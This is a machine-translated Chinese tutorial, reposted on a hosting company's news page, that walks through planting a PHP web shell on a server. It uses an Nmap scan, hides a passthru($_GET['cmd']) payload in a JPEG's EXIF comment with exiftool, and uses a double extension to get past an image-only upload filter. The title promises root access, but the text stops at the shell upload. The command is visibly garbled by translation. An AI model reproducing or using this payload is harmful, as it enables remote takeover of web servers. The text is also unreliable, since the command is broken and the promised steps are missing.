这篇文章主要介绍Shell如何上载到Web服务器并获得Root,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!
要求
本教程的这一部分将需要Nmap。
步骤1:扫描服务器
对于本教程,我在网络上设置了易受攻击的服务器。让我们来扫描一下。
Nmap找到了两个开放端口:80和22,因此我们知道服务器同时具有HTTP和SSH服务。让我们访问该网页...
第2步:上传尝试
让我们查看上传页面...
该表格告诉我们该文件必须是.jpeg,.jpg或.png文件。但是,以防万一,我们将尝试上传恶意的PHP文件。
真是的 它不会上传。但是,如果我们将恶意代码添加到图片文件的Exif数据中怎么办?
步骤3:将图片后门
为了上传我们的外壳,我们需要使用合法的图片文件。为了使我们的代码运行,我们需要将PHP代码添加到Exif数据中。输入此命令:
exiftool -Comment =“ <?php passthru(\ $ _ GET'cmd'); _halt_compiler();” /root/picture.jpeg
在\ $ _ GET'cmd'); 代码是读取我们的命令的内容,而_halt_compiler(); 防止文件检查系统继续读取二进制数据。
现在,让我们运行命令的PHP代码被添加到注释中。将文件重命名为picture.php.jpeg,以便强制网站处理PHP代码。
步骤4:再试一次
现在,让我们上传后门文件。
是! 有效!现在,我们可以使用命令通过Web浏览器对其进行控制。
以上是“Shell如何上载到Web服务器并获得Root”这篇文章的所有内容,感谢各位的阅读!希望分享的内容对大家有帮助,更多相关知识,欢迎关注亿速云行业资讯频道!
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。